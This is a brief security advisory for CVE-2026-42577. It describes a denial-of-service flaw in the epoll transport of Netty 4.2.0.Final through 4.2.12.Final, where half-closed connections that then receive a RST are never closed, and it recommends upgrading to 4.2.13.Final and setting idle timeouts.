CVE-2026-42577

Name of the Vulnerable Software and Affected Versions Netty versions 4.2.0.Final through 4.2.12.Final

Description Netty's epoll transport fails to detect and close TCP connections that receive a RST after being half-closed. This occurs when a connection has ALLOW HALF CLOSURE enabled or is in a half-closed state via the HTTP codec, and the remote peer sends a FIN followed by a RST. Because epollOutReady() is a no-op without a pending flush and epollInReady() short-circuits when input is marked as shutdown, the EPOLLERR/EPOLLHUP error condition is not processed, and channelInactive is never triggered. This leads to stale channels that exhaust file descriptors, memory, or connection-count limits. In certain code paths where clearEpollIn0() is not called during the ChannelInputShutdownReadComplete event, it can cause a 100% CPU busy-loop in the event loop thread, starving other multiplexed connections.

Recommendations Update to version 4.2.13.Final. Configure idle timeouts on connections to limit the lifetime of stale channels.